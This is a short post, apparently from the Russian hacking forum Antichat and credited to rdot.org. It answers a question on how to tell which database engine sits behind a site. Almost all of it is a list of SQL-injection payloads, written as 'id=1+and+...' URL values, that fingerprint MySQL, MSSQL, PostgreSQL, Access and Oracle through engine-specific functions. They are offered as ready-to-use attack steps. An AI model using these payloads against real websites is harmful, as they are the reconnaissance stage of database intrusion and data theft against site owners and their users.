08.06.2011, 19:09
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от foozzi
2 - как определить mysql от mssql и oracle ? кроме символов комментариев?
Код:
id=1+procedure+analyse()
id=1+and+concat_ws(1)=1
id=1+and+connection_id()=connection_id()
MSSQL
Код:
id=1+and+len(@@version)=len(@@version)
id=1+and+(@@TEXTSIZE>@@LANGID)
PostgerSQL
Код:
id=1+and+1=1::int
id=1+and+pg_backend_pid()=pg_backend_pid()
id=1+and+5432=inet_server_port()
Access
Код:
id=1+and+1=StrConv(1,1)
id=1+and+Sgn(1)=Sgn(1)
Oracle
Код:
id=1+and+to_char(22)=to_char(2)||to_char(2)
id=1+and+instr4(1,1,1,1)=1
id=1+and+rownum=rownum
Взято отсюда: https://rdot.org/forum/showpost.php?p=695&postcount=1
|
|
|